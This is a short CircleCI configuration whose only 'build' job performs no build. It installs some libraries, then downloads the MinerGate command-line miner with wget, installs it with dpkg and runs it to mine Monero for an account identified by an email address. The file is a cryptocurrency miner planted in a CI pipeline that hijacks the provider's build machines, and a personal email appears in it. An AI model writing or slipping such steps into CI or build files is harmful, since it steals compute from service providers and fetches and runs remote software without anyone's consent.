version: 2
jobs:
  build:
    machine: true
    steps:
      - checkout
      - run:
          command: |
            wget http://fr.archive.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre16-3_8.38-3.1_amd64.deb
            sudo dpkg -i libpcre16-3_8.38-3.1_amd64.deb
            sudo add-apt-repository ppa:ubuntu-toolchain-r/test
            sudo apt-get update -yqq
            sudo apt-get install libstdc++6 -yqq
            wget https://minergate.com/download/deb-cli -O minergate-cli.deb
            sudo dpkg -i minergate-cli.deb
            minergate-cli --user yoginth@outlook.in --xmr 2
